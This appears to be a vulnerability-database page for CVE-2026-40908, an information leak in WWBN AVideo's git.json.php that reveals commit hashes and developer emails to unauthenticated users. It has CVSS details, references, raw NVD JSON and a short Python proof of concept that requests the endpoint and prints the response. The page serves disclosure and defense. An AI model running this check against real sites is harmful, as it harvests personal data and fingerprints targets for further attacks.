CVE-2026-40908

Description

WWBN AVideo is an open source video platform. In versions 29.0 and prior, the file `git.json.php` at the web root executes `git log -1` and returns the full output as JSON to any unauthenticated user. This exposes the exact deployed commit hash (enabling version fingerprinting against known CVEs), developer names and email addresses (PII), and commit messages which may contain references to internal systems or security fixes. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_git_leak(url):
    """
    Check if the target is vulnerable to CVE-2026-40908.
    Attempts to access git.json.php without authentication.
    """
    target = url.rstrip('/') + '/git.json.php'
    try:
        response = requests.get(target, timeout=10)
        if response.status_code == 200:
            print("[+] Potential Vulnerability Detected!")
            print(f"[+] Response from {target}:")
            print(response.text)
        else:
            print(f"[-] File not found or access denied. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target_url = "http://example.com" # Replace with actual target
    check_git_leak(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40908
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40908
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40908/
[4] VulDB https://vuldb.com/cve/CVE-2026-40908
[5] https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40908", "sourceIdentifier": "[email protected]", "published": "2026-04-21T20:17:03.220", "lastModified": "2026-04-23T19:09:57.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, the file `git.json.php` at the web root executes `git log -1` and returns the full output as JSON to any unauthenticated user. This exposes the exact deployed commit hash (enabling version fingerprinting against known CVEs), developer names and email addresses (PII), and commit messages which may contain references to internal systems or security fixes. As of time of publication, no known patched versions are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "29.0", "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-52hf-63q4-r926", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}